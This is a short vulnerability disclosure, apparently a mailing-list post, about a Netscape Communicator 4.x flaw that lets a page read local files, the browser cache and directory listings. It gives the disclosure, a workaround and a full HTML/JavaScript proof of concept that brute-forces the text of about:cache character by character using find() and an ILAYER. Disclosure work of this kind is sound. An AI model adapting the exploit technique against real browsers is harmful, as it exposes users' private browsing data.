Netscape Communicator find() vulnerabilities

[guninski () HOTMAIL COM (Georgi Guninski)]

There is a design flaw in Netscape Communicator 4.5 Win95, 4.08 WinNT (I
guess all 4.x version are vulnerable)
which allows the following security exploits:

 *)Reading the parsed content of local HTML files (by 'parsed' I mean
the text the user sees, not the actual HTML source)
 *)Reading the parsed content of HTML files on a web server blocked by a
firewall (the browser and the web server must be on the same side of the
firewall)
 *)Reading user's cache
 *)Browsing directories
 *)Probably others

The exploits use the JavaScript find() function and the ILAYER tag.
This may be exploited using HTML message.

Workaround: Disable JavaScript

Demonstration is available at:
 http://www.nat.bg/~joro/nsfind.html


-----------HTML code-------------
MBEGIN
<ILAYER SRC="wysiwyg://1/about:cache">
</ILAYER>

<SCRIPT>
//mag='MBEGIN';
mag='Average cache';
mend='MEND';
res=mag;
charstoread=100;

function readit() {
for(i=0;i<charstoread;i++) {
 t=res;
 find(mend);
 for(c=1;c<256;c++) {
   t=res + String.fromCharCode(c);

     if (find(t,true,true)) {
//      alert(c);
      res=t;
     }
 }
}
res=res.substring(mag.length);
alert("The first URL in your cache is: \n" + res);
}
setTimeout('readit();',3000);
</SCRIPT>


MEND


---------------------------------

Regards,
Georgi Guninski
 http://www.nat.bg/~joro